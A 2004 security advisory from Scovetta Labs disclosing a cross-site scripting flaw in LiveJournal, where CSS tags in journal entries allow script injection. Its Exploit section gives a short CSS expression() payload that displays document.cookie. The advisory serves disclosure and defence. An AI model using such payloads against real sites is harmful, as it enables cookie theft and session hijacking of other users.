LiveJournal CSS HTML Injection Vulnerability

Download Report

=====[BEGIN-SCL-REPORT]=====
 
________________________________________________________________________

                   Scovetta Labs Security Advisory

 Title:         LiveJournal CSS HTML Injection Vulnerability
 Status:        Public
 Release Date:  2004-02-23
________________________________________________________________________

 Package:       LiveJournal
 Vendor:        LiveJournal - www.livejournal.org
 Priority:      Medium
 Vulnerability: Cross-Site Scripting


Affected Versions:
==================

 Unknown/


Description:
============

 LiveJournal is reportedly prone to HTML injection via Cascading Style 
 Sheet (CSS) tags. It is possible to inject hostile HTML and script 
 code into journal entries through this vulnerability.

 This could potentially be exploited to steal cookies from other site 
 users. Other attacks are also possible. 


Exploit:
========

 <style>
  .test1 { color:e\xpression(alert(document.cookie)); }
 </style>

 <a class="test1">foo</a> 


Vendor Response:
================

 Unknown.


Credits:
========

 Michael Scovetta of Scovetta Labs discovered this vulnerability.


References:
==========
 [0] http://www.secumania.org/security/vulnerabilities/
      livejournal-css-html-injection-vulnerability-2004022311604/
 

Disclaimer
==========

 The content of this report is purely informational and meant only 
 for the purpose of education and protection. Scovetta Labs and 
 Michael Scovetta shall in no event be liable for any damage 
 whatsoever, direct or implied, arising from use or spread of this 
 information. All identifiers (hostnames, IP addresses, company names, 
 individual names etc.) used in examples and demonstrations are used 
 only for explanatory purposes and have no connection with any real 
 host, company or individual. In no event should it be assumed that 
 use of these names means specific hosts, companies or individuals 
 are vulnerable to any attacks nor does it mean that they consent to 
 being used in any vulnerability tests. The use of information in 
 this report is entirely at user's risk.

 
Copyright
=========
 
 (c) 2004 Michael Scovetta. Forwarding and publishing of this document 
 is permitted providing the content between "[BEGIN-SCL-REPORT]" and
 "[END-SCL-REPORT]" marks remains unchanged.


=====[END-SCL-REPORT]=====